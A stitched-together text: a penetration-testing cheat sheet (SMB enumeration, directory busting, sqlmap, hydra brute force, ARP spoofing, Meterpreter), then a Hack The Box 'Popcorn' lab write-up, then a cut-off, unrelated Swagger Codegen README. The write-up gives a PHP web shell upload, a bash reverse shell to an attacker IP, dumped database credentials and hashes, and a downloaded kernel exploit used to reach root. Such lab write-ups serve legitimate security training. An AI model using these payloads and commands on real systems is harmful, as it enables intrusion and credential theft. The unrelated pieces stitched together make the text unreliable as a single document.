````bash smbmap -H 10.10.10.1 ```` ````bash rpcclient -U "" -N 10.10.10.1 ```` ````bash smbclient \\\\$ip\\ShareName ````` ##### if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED" ````bash smbclient -L //10.10.10.3/ --option='client min protocol=NT1' ```` #### List Shares: ````bash smbmap -H 10.10.1.1 ```` ````bash echo exit | smbclient -L \\\\10.10.10.10 ```` ````bash nmap --script smb-enum-shares -p 139,445 10.10.10.10 ```` #### Check for SMB Vulnerabilities with Nmap: ````bash nmap --script smb-vuln* -p 139,445 10.10.10.10 ```` #### Vulnerable Versions: ````bash • Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default • Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default • Most Samba (Unix) servers ```` #### List of SMB versions and corresponding Windows versions: ````bash • SMB1 – Windows 2000, XP and Windows 2003. • SMB2 – Windows Vista SP1 and Windows 2008 • SMB2.1 – Windows 7 and Windows 2008 R2 • SMB3 – Windows 8 and Windows 2012. ```` # Web Application Enumeration / Exploitation - Port 80,443,8080 #### Make sure that you enumerate, and enumerate some more. :wink: ![image](https://user-images.githubusercontent.com/80599694/147911298-00e672ff-9bb8-475c-ac03-a00ab3cb170c.png) ## Web Application Enumeration Checklist: ````bash 1. Checkout the entire webpage and what it is displaying. 2. Read every page, look for emails, names, user info, etc. 3. Directory Discovery (time to dir bust!) 4. Enumerate the interface, what is the CMS & Version? Server installation page? 5. Check for potential Local File Inclusion, Remote File Inclusion, SQL Injection, XXE, and Upload vulnerabilities 6. Check for a default server page, identify the server version 7. View Source Code: a. Check for hidden values b. Check for comments/developer remarks c. Check for Extraneous Code d. Check for passwords 8. Check for robots.txt file 9. Web Scanning ```` ### Directory Discovery/Dir Busting: ````bash gobuster dir -u 10.10.10.181 -w /usr/share/seclists/Discovery/Web-Content/common.txt ```` #### Gobuster Quick Directory Discovery ````bash gobuster -u $ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux ````` #### Gobuster Directory Busting: ````bash wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Top1000-RobotsDisallowed.txt; gobuster -u http://10.10.10.10. -w Top1000-RobotsDisallowed.txt ```` ````bash gobuster dir -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o gobuster-root -t 50 ```` #### Gobuster comprehensive directory busting: ````bash gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' ```` #### Gobuster search with file extension: ````bash gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php ```` #### wfuzz search with files: ````bash wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200 http://10.10.10.10/FUZZ ```` #### Erodir by PinkP4nther ````bash ./erodir -u http://10.10.10.10 -e /usr/share/wordlists/dirb/common.txt -t 20 ```` #### dirsearch.py ````bash cd /root/dirsearch; python3 dirsearch.py -u http://10.10.10.10/ -e .php ```` #### If you are really stuck, run this: ````bash for file in $(ls /usr/share/seclists/Discovery/Web-Content); do gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/$file -e -k -l -s "200,204,301,302,307" -t 20 ; done ```` #### Check different extensions: ````bash sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar ```` ## SQL Injection Testing (automated!) #### if you follow the above check list, you should have a list of parameters to test for SQL injection. Automate it with SQLMAP! #### SQLmap Commands: ````bash sqlmap -u http://10.10.10.10 -p parameter sqlmap -u http://10.10.10.10 --data POSTstring -p parameter sqlmap -u http://10.10.10.10 --os-shell sqlmap -u http://10.10.10.10 --dump ```` # Password Cracking #### I highly suggest you learn how to use John The Ripper, Hydra, and how to unshadow passwd files. :wink: ![image](https://user-images.githubusercontent.com/80599694/147914303-6417c637-a380-41d7-a716-76cbc6b4ff9e.png) ### Unshadow #### This will prepare the file for John The Ripper, you need a Passwd & Shadow File. ````bash unshadow passwd shadow > unshadow ```` ### Hash Cracking - John The Ripper ````bash john -wordlist /path/to/wordlist -users=users.txt hashfile ```` # Networking - Routing #### I highly recommend that you get comfortable with general networking and routing concepts, including be able to read and understand .PCAP files. ![image](https://user-images.githubusercontent.com/80599694/147913167-35155f9d-f7f5-473e-90f9-302f0b5d7bb2.png) ### Set up IP Routing and Routing Tables ````bash ip route - prints the routing table for the host you are on ip route add ROUTETO via ROUTEFROM - add a route to a new network if on a switched network and you need to pivot ```` ### ARP Spoofing ````bash echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11 ```` ### SSH Tunneling / Port Forwarding ````bash # local port forwarding # the target host 192.168.0.100 is running a service on port 8888 # and you want that service available on the localhost port 7777 ssh -L 7777:localhost:8888 [email protected] # remote port forwarding # you are running a service on localhost port 9999 # and you want that service available on the target host 192.168.0.100 port 12340 ssh -R 12340:localhost:9999 [email protected] # Local proxy through remote host # You want to route network traffic through a remote host target.host # so you create a local socks proxy on port 12001 and configure the SOCKS5 settings to localhost:12001 ssh -C2qTnN -D 12001 [email protected] ```` ### Network/Service Attacks #### You may need to bruteforce a service running, such as SSH, FTP, etc. Just replace the service name below to bruteforce. ```bash hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22 hydra -L users.txt -P pass.txt telnet://10.10.10.10 ``` # Using Metasploit #### I highly recommend getting comfortable with metasploit, and meterpreter just incase you find Remote Code Execution, and spawn a shell. ![image](https://user-images.githubusercontent.com/80599694/147913813-b8f42c43-3377-420f-ad8a-7524f50192ed.png) ### Basic Metasploit Commands ````bash search x use x info show options, show advanced options SET X (e.g. set RHOST 10.10.10.10, set payload x) ```` ### Useful Meterpreter Commands (reverse shell) ````bash background sessions -l sessions -i 1 sysinfo, ifconfig, route, getuid getsystem (privesc) bypassuac download x /root/ upload x C:\\Windows shell use post/windows/gather/hashdump ````
# Popcorn: 10.10.10.6 ## Hints - Enumeration helps find a "hidden" web application - Getting a foothold is all about a malicious PHP file upload vulnerability - For privesc, think about how old the Linux system is ## nmap Starting with the usual `nmap` scan. Interesting ports: ```none 22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.2.12 ((Ubuntu)) ``` ## 80: Recon Looking at port 80, we see the (old) default Apache page. ![Home page](screenshots/80_home.png) Started a `gobuster` on the root of the webserver. Almost instantly, found the `test.php` page. Loading up the page, and got the `phpinfo()` output included in the page. This is some really useful info. ![Home page](screenshots/80_phpinfo.png) One this I noted was the PHP version that was installed. ```none PHP Version 5.2.10-2ubuntu6.10 ``` After a while, another directory was discovered by `gobuster`, named `torrent`. Browsing to the URL shows a "Torrent Hoster" web app. ![Home page](screenshots/80_torrent_home.png) Started to do some research in the background. Although this seems like "actual software" - there is little information about it (e.g., GitHub or SourceForge repo), and the website copyright was back in 2007. The only links I can find on Google are about Hack The Box. So instead I started to poke around the web application - trying all the links, and looking for some user input. Also tried a `searchsploit` which did discover one vulnerability. ```none └─$ searchsploit torrent hoster ---------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------- --------------------------------- Torrent Hoster - Remount Upload | php/webapps/11746.txt ---------------------------------------------------------------------------------- --------------------------------- ``` Having a look at this didn't really help much. I couldn't figure out what the exploit was doing. But it did give me the idea of testing all the file uploads. But to upload something you need to be registered. Luckily, registration was open to anyone! After making an account, I tried the torrent upload using an Ubuntu 20.04 torrent file. ```none wget https://releases.ubuntu.com/20.04/ubuntu-20.04.2-live-server-amd64.iso.torrent ``` Tried modifying the request to upload some PHP code - but had no luck. This took longer than I would like to admit, but I finally found the screenshot/image that you can add to an existing torrent. I intercepted request to change the screenshot using the default `thumbnail.png` file from the web app. For image uploads I always start simple, and add more layers of complexity. [HackTricks File Upload General Methodology](https://book.hacktricks.xyz/pentesting-web/file-upload) is a great resource for this process. Anyway, I modified the request to have a PHP payload in the body, and a `.php` extension. That way we can execute the file. At this point, I went back to the `phpinfo()` page to check for file upload capability, and for blacklisted PHP functions - but all looked good. ![File upload modification in Burp](screenshots/80_torrent_upload_burp.png) A trick I have learned from _ippsec_ is to use a generic PHP payload that we can send a HTTP request parameter. This is much more flexible than a reverse shell as we can run commands, and do more testing without continually uploading files. My go to payload is: ```none <?php system($_REQUEST["cmd"]) ?> ``` Finding the uploaded file is possible, as it is displayed when you hover over the screenshot in the web app. It is under `torrent/upload`. ![File upload location](screenshots/80_torrent_upload.png) Looks like the file name is changed to a hash of something. I couldn't figure out what the hash is, as it is not the filename or the file. Looking at the web source would probably determine what it is. Anyway, now we have code execution. ![Code execution](screenshots/80_torrent_codeexecution.png) I intercepted a request using Burp, and started trying to get a reverse shell. Used a standard bash shell - which worked well. ```none cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1' ``` A side note, this was the first time I changed my GET request to a POST request. This is possible, as the PHP payload isn't only for GET requests. I must say, using a POST request is much cleaner and simpler for trying different payloads. From here, we have a reverse shell as the `www-data` user. ```none └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.4] from (UNKNOWN) [10.10.10.6] 51583 bash: no job control in this shell www-data@popcorn:/var/www/torrent/upload$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` Found the user flag in the `george` home directory ```none www-data@popcorn:/home/george$ wc -c user.txt wc -c user.txt 33 user.txt ``` ## Privesc Rabbithole Thought it was interesting to include some of the database password enumeration I did, just to have in my notes. Linpeas found the following database credentials. ```none ╔══════════╣ Searching passwords in config PHP files $dbpass = $CFG->dbPassword; $dbuser = $CFG->dbUserName; $CFG->dbPassword = "SuperSecret!!"; //db password $CFG->dbUserName = "torrent"; //db username ``` Given these, I logged into the database to look for more info. ```none www-data@popcorn:/home/george$ mysql -u torrent -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 65 Server version: 5.1.37-1ubuntu5.5 (Ubuntu) Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> ``` I don't use MySQL regularly enough, so I always need to look up the syntax. My go to is this [MySQL Cheatsheet](https://gist.github.com/hofmannsven/9164408). ``` mysql> show databases; ... mysql> use torrenthoster ... mysql> show tables; ... mysql> select * from users; +----+----------+----------------------------------+-----------+----------------------+---------------------+---------------------+ | id | userName | password | privilege | email | joined | lastconnect | +----+----------+----------------------------------+-----------+----------------------+---------------------+---------------------+ | 3 | Admin | d5bfedcee289e5e05b86daad8ee3e2e2 | admin | [email protected] | 2007-01-06 21:12:46 | 2007-01-06 21:12:46 | | 5 | tom | 34b7da764b21d298ef307d04d8152dc5 | user | [email protected] | 2021-07-25 08:26:39 | 2021-07-25 08:26:39 | +----+----------+----------------------------------+-----------+----------------------+---------------------+---------------------+ 2 rows in set (0.00 sec) ``` I tried to crack the password for the `admin` user - looking for password reuse on the system. Started with a reverse hash lookup: ```none https://md5.gromweb.com/?md5=d5bfedcee289e5e05b86daad8ee3e2e2 ``` I knew it was md5, as I can reverse the password for my user. With no reverse hash lookup, tried `john`. ``` └─$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt admin_hash Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3]) Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:00 DONE (2021-07-25 19:16) 0g/s 18156Kp/s 18156Kc/s 18156KC/s fuckyooh21..*7¡Vamos! Session completed ``` No luck! Also tried to database password everywhere, but that didn't work either! Moving on! ## Privesc: `www-data` to `root` At some point it is good to stop your current path and switch. I am getting better at this, but it takes practice. I took a 5 minute tea break and thought that my method was too complex. Thinking simply, it seemed like a decent path would be attacking an old system, instead password reuse. I mean, look at the operating system! It is ancient! ```none ╔══════════╣ Operative system ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits Linux version 2.6.31-14-generic-pae (buildd@rothera) (gcc version 4.4.1 (Ubuntu 4.4.1-4ubuntu8) ) #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 Distributor ID: Ubuntu Description: Ubuntu 9.10 Release: 9.10 Codename: karmic ``` I decided to run the [LES: Linux privilege escalation auditing tool](https://github.com/mzet-/linux-exploit-suggester) on the system, to try find suitable exploits. I had not used the tool before, but it is a simple bash script, and seems to get updated regularly. The full tool output is available in the logs folder. The first exploit listed was Full Neloson. ```none [+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson Details: http://vulnfactory.org/exploits/full-nelson.c Exposure: highly probable Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server} Download URL: http://vulnfactory.org/exploits/full-nelson.c ``` I downloaded to source code. ```none wget http://vulnfactory.org/exploits/full-nelson.c ``` And uploaded it to server, and compiled it using the instructions in the source code. ```none www-data@popcorn:/dev/shm$ gcc full-nelson.c -o full-nelson gcc full-nelson.c -o full-nelson www-data@popcorn:/dev/shm$ ls ls full-nelson full-nelson.c les.sh linpeas.sh www-data@popcorn:/dev/shm$ ./full-nelson ./full-nelson id uid=0(root) gid=0(root) ``` Success! A shell as `root`! ```none wc -c /root/root.txt 33 /root/root.txt ``` Done! ## Lessons Learned - Use POST requests for simpler PHP payload manipulation when using `$_REQUEST` - Linux Exploit Suggester is a good tool for Linux privesc ## Useful Resources - [HackTheBox - Popcorn by ippsec](https://www.youtube.com/watch?v=NMGsnPSm8iw) - [HTB: Popcorn by 0xdf](https://0xdf.gitlab.io/2020/06/23/htb-popcorn.html) - [How To Hack: Popcorn From HackTheBox by Marvin Gerlach](https://infosecwriteups.com/hackthebox-popcorn-f1ace3de846d)
# Swagger Code Generator [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea) [![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project) [![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen) :star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star: :notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover: :warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning: ## Overview This is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported: - **API clients**: **ActionScript**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign), **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x), **Typescript** (Angular1.x, Angular2.x, Fetch, Node) - **Server stubs**: **C#** (ASP.NET Core, NancyFx), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy), **PHP** (Lumen, Slim, Silex, [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra) - **API documentation generators**: **HTML**, **Confluence Wiki** - **Others**: **JMeter** Check out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project. # Table of contents - [Swagger Code Generator](#swagger-code-generator) - [Overview](#overview) - [Table of Contents](#table-of-contents) - Installation - [Compatibility](#compatibility) - [Prerequisites](#prerequisites) - [OS X Users](#os-x-users) - [Building](#building) - [Docker](#docker) - [Build and run](#build-and-run-using-docker) - [Run docker in Vagrant](#run-docker-in-vagrant) - [Public Docker image](#public-docker-image) - [Homebrew](#homebrew) - [Getting Started](#getting-started) - Generators - [To generate a sample client library](#to-generate-a-sample-client-library) - [Generating libraries from your server](#generating-libraries-from-your-server) - [Modifying the client library format](#modifying-the-client-library-format) - [Making your own codegen modules](#making-your-own-codegen-modules) - [Where is Javascript???](#where-is-javascript) - [Generating a client from local files](#generating-a-client-from-local-files) - [Customizing the generator](#customizing-the-generator) - [Validating your OpenAPI Spec](#validating-your-openapi-spec) - [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation) - [Generating static html api documentation](#generating-static-html-api-documentation) - [To build a server stub](#to-build-a-server-stub) - [To build the codegen library](#to-build-the-codegen-library) - [Workflow Integration](#workflow-integration) - [Github Integration](#github-integration) - [Online Generators](#online-generators) - [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution) - [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen) - [Swagger Codegen Core Team](#swagger-codegen-core-team) - [Swagger Codegen Evangelist](#swagger-codegen-evangelist) - [License](#license) ## Compatibility The OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification: Swagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes -------------------------- | ------------ | -------------------------- | ----- 2.3.0 (upcoming minor release) | TBD | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes 2.2.2 (upcoming patch release) | TBD | 1.0, 1.1, 1.2, 2.0 | Patch release (without breaking changes) 2.2.1 (**current stable**) | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1) 2.1.6 | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6) 2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17) 1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1) ### Prerequisites If you're looking for the latest stable version, you can grab it directly from maven central (you'll need java 7 runtime at a minimum): ``` wget http://repo1.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.1/swagger-codegen-cli-2.2.1.jar -O swagger-codegen-cli.jar java -jar swagger-codegen-cli.jar help ``` On a mac, it's even easier with `brew`: ``` brew install swagger-codegen ``` To build from source, you need the following installed and available in your $PATH: * [Java 7 or 8](http://java.oracle.com) * [Apache maven 3.3.3 or greater](http://maven.apache.org/) #### OS X Users Don't forget to install Java 7 or 8. You probably have 1.6. Export JAVA_HOME in order to use the supported Java version: ``` export JAVA_HOME=`/usr/libexec/java_home -v 1.8` export PATH=${JAVA_HOME}/bin:$PATH ``` ### Building After cloning the project, you can build it from source with this command: ``` mvn clean package ``` ### Homebrew To install, run `brew install swagger-codegen` Here is an example usage: ``` swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/ ``` ### Docker #### Development in docker You can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen` in the docker container. It also maps `~/.m2/repository` to the appropriate container location. To execute `mvn package`: ``` git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen ./run-in-docker.sh mvn package ``` Build artifacts are now accessible in your working directory. Once built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example: ``` ./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli ./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli ./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client ./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \ -l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore ``` #### Run Docker in Vagrant Prerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads). ``` git clone http://github.com/swagger-api/swagger-codegen.git cd swagger-codegen vagrant up vagrant ssh cd /vagrant ./run-in-docker.sh mvn package ``` #### Public Pre-built Docker images - https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service) - https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI) ======= ##### Swagger Generator Docker Image The Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code. Example usage (note this assumes `jq` is installed for command line processing of JSON): ``` # Start container and save the container id CID=$(docker run -d swaggerapi/swagger-generator) # allow for startup sleep 5 # Get the IP of the running container GEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID) # Execute an HTTP request and store the download link RESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" }' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '"') # Download the generated zip and redirect to a file curl $RESULT > result.zip # Shutdown the swagger generator image docker stop $CID && docker rm $CID ``` In the example above, `result.zip` will contain the generated client. ##### Swagger Codegen Docker Image The Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version. To generate code with this image, you'll need to mount a local location as a volume. Example: ``` docker run --rm -v ${PWD}:/local swagger-api/swagger-codegen generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l go \ -o /local/out/go ``` The generated code will be located under `./out/go` in the current directory. ## Getting Started To generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following ```sh git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen mvn clean package java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l php \ -o /var/tmp/php_api_client ``` (if you're on Windows, replace the last command with `java -jar modules\swagger-codegen-cli\target\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\temp\php_api_client`) You can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.1/swagger-codegen-cli-2.2.1.jar ) To get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate` To get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php` ## Generators ### To generate a sample client library You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows: ``` ./bin/java-petstore.sh ``` (On Windows, run `.\bin\windows\java-petstore.bat` instead) This will run the generator with this command: ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java ``` with a number of options. You can get the options with the `help generate` command: ``` NAME swagger-codegen-cli generate - Generate code with chosen lang SYNOPSIS swagger-codegen-cli generate [(-a <authorization> | --auth <authorization>)] [--additional-properties <additional properties>] [--api-package <api package>] [--artifact-id <artifact id>] [--artifact-version <artifact version>] [(-c <configuration file> | --config <configuration file>)] [-D <system properties>] [--group-id <group id>] (-i <spec file> | --input-spec <spec file>) [--import-mappings <import mappings>] [--instantiation-types <instantiation types>] [--invoker-package <invoker package>] (-l <language> | --lang <language>) [--language-specific-primitives <language specific primitives>] [--library <library>] [--model-package <model package>] [(-o <output directory> | --output <output directory>)] [(-s | --skip-overwrite)] [(-t <template directory> | --template-dir <template directory>)] [--type-mappings <type mappings>] [(-v | --verbose)] OPTIONS -a <authorization>, --auth <authorization> adds authorization headers when fetching the swagger definitions remotely. Pass in a URL-encoded string of name:header with a comma separating multiple values --additional-properties <additional properties> sets additional properties that can be referenced by the mustache templates in the format of name=value,name=value --api-package <api package> package for generated api classes --artifact-id <artifact id> artifactId in generated pom.xml --artifact-version <artifact version> artifact version in generated pom.xml -c <configuration file>, --config <configuration file> Path to json configuration file. File content should be in a json format {"optionKey":"optionValue", "optionKey1":"optionValue1"...} Supported options can be different for each language. Run config-help -l {lang} command for language specific config options. -D <system properties> sets specified system properties in the format of name=value,name=value --group-id <group id> groupId in generated pom.xml -i <spec file>, --input-spec <spec file> location of the swagger spec, as URL or file (required) --import-mappings <import mappings> specifies mappings between a given class and the import that should be used for that class in the format of type=import,type=import --instantiation-types <instantiation types> sets instantiation type mappings in the format of type=instantiatedType,type=instantiatedType.For example (in Java): array=ArrayList,map=HashMap. In other words array types will get instantiated as ArrayList in generated code. --invoker-package <invoker package> root package for generated code -l <language>, --lang <language> client language to generate (maybe class name in classpath, required) --language-specific-primitives <language specific primitives> specifies additional language specific primitive types in the format of type1,type2,type3,type3. For example: String,boolean,Boolean,Double --library <library> library template (sub-template) --model-package <model package> package for generated models -o <output directory>, --output <output directory> where to write the generated files (current dir by default) -s, --skip-overwrite specifies if the existing files should be overwritten during the generation. -t <template directory>, --template-dir <template directory> folder containing the template files --type-mappings <type mappings> sets mappings between swagger spec types and generated code types in the format of swaggerType=generatedType,swaggerType=generatedType. For example: array=List,map=Map,string=String --reserved-words-mappings <import mappings> specifies how a reserved name should be escaped to. Otherwise, the default _<name> is used. For example id=identifier -v, --verbose verbose mode ``` You can then compile and run the client, as well as unit tests against it: ``` cd samples/client/petstore/java mvn package ``` Other languages have petstore samples, too: ``` ./bin/android-petstore.sh ./bin/java-petstore.sh ./bin/objc-petstore.sh ``` ### Generating libraries from your server It's just as easy--just use the `-i` flag to point to either a server or file. ### Modifying the client library format Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own. You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy. ### Making your own codegen modules If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries: ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \ -o output/myLibrary -n myClientCodegen -p com.my.company.codegen ``` This will write, in the folder `output/myLibrary`, all the files you need to get started, including a README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic. You would then compile your library in the `output/myLibrary` folder with `mvn package` and execute the codegen like such: ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` For Windows users, you will need to use `;` instead of `:` in the classpath, e.g. ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar;modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` Note the `myClientCodegen` is an option now, and you can use the usual arguments for generating your library: ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar \ io.swagger.codegen.SwaggerCodegen generate -l myClientCodegen\ -i http://petstore.swagger.io/v2/swagger.json \ -o myClient ``` ### Where is Javascript??? See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require static code generation. There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a OpenAPI Specification. :exclamation: On Dec 7th 2015, a Javascript API client generator has been added by @jfiala. ### Generating a client from local files If you don't want to call your server, you can save the OpenAPI Spec files into a directory and pass an argument to the code generator like this: ``` -i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json ``` Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane. ### Selective generation You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output: The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated: ``` # generate only models java -Dmodels {opts} # generate only apis java -Dapis {opts} # generate only supporting files java -DsupportingFiles # generate models and supporting files java -Dmodels -DsupportingFiles ``` To control the specific files being generated, you can pass a CSV list of what you want: ``` # generate the User and Pet models only -Dmodels=User,Pet # generate the User model and the supportingFile `StringUtil.java`: -Dmodels=User -DsupportingFiles=StringUtil.java ``` To control generation of docs and tests for api and models, pass false to the option. For api, these options are `-DapiTests=false` and `-DapiDocs=false`. For models, 